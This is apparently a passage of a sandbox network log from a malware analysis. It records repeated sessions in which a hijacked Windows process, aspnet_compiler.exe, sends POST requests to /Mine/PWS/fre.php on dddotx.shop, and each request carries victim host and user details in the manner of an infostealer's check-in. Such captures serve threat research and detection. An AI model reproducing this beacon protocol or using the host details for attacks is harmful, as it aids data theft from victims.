Sep 25, 2024 15:29:08.155661106 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iFDPp5lu4YV2W6dMQAd%2B2ShykyGScHmyYuiTtqTIYAT1Y8tD4RvOLUNr4cmwACWt1GsmjtpAgaArCc1JF8gWlqKVzAR9ou0rxSzxTMPcGhE0eNbpob%2FfEjE7umTbNA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c801d30c32d-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	55910	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:08.314676046 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:08.319577932 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:09.003256083 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gVO%2F5A8JAU9qQZcaVERm1%2BEgkkCK5hujTQWyYMbZ4oOPVyyCdzBFkA7EHUqEpTu5Zx%2BSea8pJHtLZ2e2grtdKQ%2B5s3oss4ew%2Bli4%2BEoA1DZUMzZZVmsEjVFwY5o3vA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c8578edc41d-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	55911	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:09.174232006 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:09.181025982 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:09.872705936 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LU4VHpSzuRNjh8ksC51UaT0dS2iyoIu1dBWDF97muLVazraUNDK5b31qRII4Gw6uoQFkTWNGwTbbVT4AxD1%2FZusqGf1pmy4BlVV9AOLTQGnWoiRu%2BCANEuHK5mvDYw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c8b0dde0c88-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	55912	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:10.034786940 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:10.039622068 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:10.728037119 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q5areRQ8RVW6i6Kx6nB6uSw5wKrsFsOgbT0dL7Mfu4Q2hhnTp836gcPsrU82P0%2FHooIINORbheluJd75JC%2F%2B9l3XpDYnOjrRBqwYxXvXyZnfhOJXcYnPLvml34hu3Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c9058956a56-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	55913	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:10.887372971 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:10.892410040 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:11.581698895 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:11 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2BBwQmk6VYBP02j2IOZyhBsJqsFAomMn57IGmAw4OlCPmVL8%2FNIABK3M59fGdrktaeHydS5Ew5Ya5Af3WHq%2FK8Qyoxq7Gm572XC8Y8nhUR6aPZdH%2BQ0Hy3ZlPbTQuA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c95afc141ba-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	55914	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:11.748871088 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:11.755446911 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:12.445864916 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XMM1Rkn41hTZYUJPHhUBND%2BJW7hWiAF%2BAlEbpcMcgSa8Vid9%2FbfJljfxwGlNCgHPymwigeeCcuny5oQLco%2FgLmg0kKGbXbKQC4JYQgEZfuPVAxJ5osBaAXIHUm%2B7Vg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5c9b09644334-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	55915	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:12.603019953 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:12.608011007 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:13.328320026 CEST	561	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:13 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3VqhxYLrrdmvgSdAClARJFzkNwAILHaHWhTqdbWqRChvC8LlsaHa3DMDi1JWkTfMdZCJCB0uWALHoG2caS0vo0Y9uX04bMK2SzEiu1CQ2m5GlZLlZalasbUS3tgNSw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5ca04f4d72ab-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	55916	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:13.482163906 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:13.487014055 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:14.283534050 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:14 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5sOSwaj8fiRlIM0KxBG9%2FihxdXciMHWHYqrZl3lpO6Tw2MQ2PrOUgUY2dS%2FuXYUUH90chAAokGnLtgULc8BeCim9iViGhawgLfCKJHMYiToVkI3XWEK%2BdhxDnvJ9w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5ca60be40f80-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	55917	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:14.452272892 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:14.457361937 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:15.163403988 CEST	597	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:15 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FjTa9SGbqI7tRrMn1jg7fOzn0AC9BrGKXpijpand7O4aqZEcn9M0RT%2BHbujCgl182XHxUIUa8CCz7q8OPzVMiNnWY5GjByE2gBIff5dTkiFb5vBQ5xs%2FctcX5YCU8Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5cabe8ff728a-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	55918	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:15.339183092 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:15.345683098 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:16.082158089 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:16 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2Blj5W9CMb7bYuc1WgWZrzJzhoba8cGZTChAW5Sf4pmJjePQ1jFkvsB5XLLCF959uNkilwnITpVWR0urSeOJkB3rT36Z7t%2BewpUR2lXPCKcgwzvX9SWtje50TmiyTw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5cb169384294-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	55919	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:16.352869034 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:16.357806921 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:17.069355011 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AjVi%2BJY08PU2qF6z7Fp3wKYVLkB5w0UjSjkmgA9EiMMNLuTuQ1U6VJK3iWgb6K1UZoaeWbqb%2Ba9DmXwcyMq2YApCmUNBkf%2FQYkibzYpcV7P3qTMvpU0QVxTVr9aD%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5cb7bdda8c21-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	55920	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:17.224992037 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:17.230321884 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:17.926692009 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:17 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5USiq06nU9CvyG6s%2FYmEoxMMTb0IVJl4IF%2BXD9v0uYxicdoUZDFyWBQt9srOnyKJSkhUZ619IvuZrcx2sYo4upqkwrE%2FAceHu%2BuE%2BBkqXP9KLxyoLqf1SRKtkAxhvA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5cbd4eb918c8-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	55921	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:18.106753111 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:18.111648083 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:18.781105042 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:18 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3EU8%2B25wVUKr3ZSxY9sIltURD30coBaEmVUSPH2tqOQ5tWNe1vOLfHKGoCm2ZwXN5enyje19NI01dAP4F3QrxMekdYcM9a%2Bb4%2B231qAjhFtGXLATBehgfOikDDHr9w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5cc2cfee4387-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	55922	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:18.943695068 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:18.948582888 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:19.609523058 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:19 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YH8pWS7ejYbgZXREx2F36uyVO65M4Mkhk3hCbYXiOVjobNHSTgOG%2FPPz%2FKjGK%2ByP6vE1Cznd28RlMy2MD%2B7Dw9oGq9Nu%2BoUvfhqxNAtHbfL%2BO2aybcnkvYHvhapHbg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5cc7ef8b0f46-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	55923	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:19.780791998 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:19.785847902 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 15:29:20.495378971 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 13:29:20 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RHozBnsqQW4Ox17iwblUh6J1btJswwpNeBFm8e9Ed8w6LkXnnHL30FLEbXklfh5ZFS81v5g%2FAv%2F8gnCv66S8V20258B7Rqdmj%2FiEKNMZjLi8VX%2BFQ0ctxeRHz%2FIVHw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8b5ccd2c911927-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	55924	188.114.96.3	80	6880	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 15:29:20.652770996 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 149 Connection: close
Sep 25, 2024 15:29:20.658124924 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
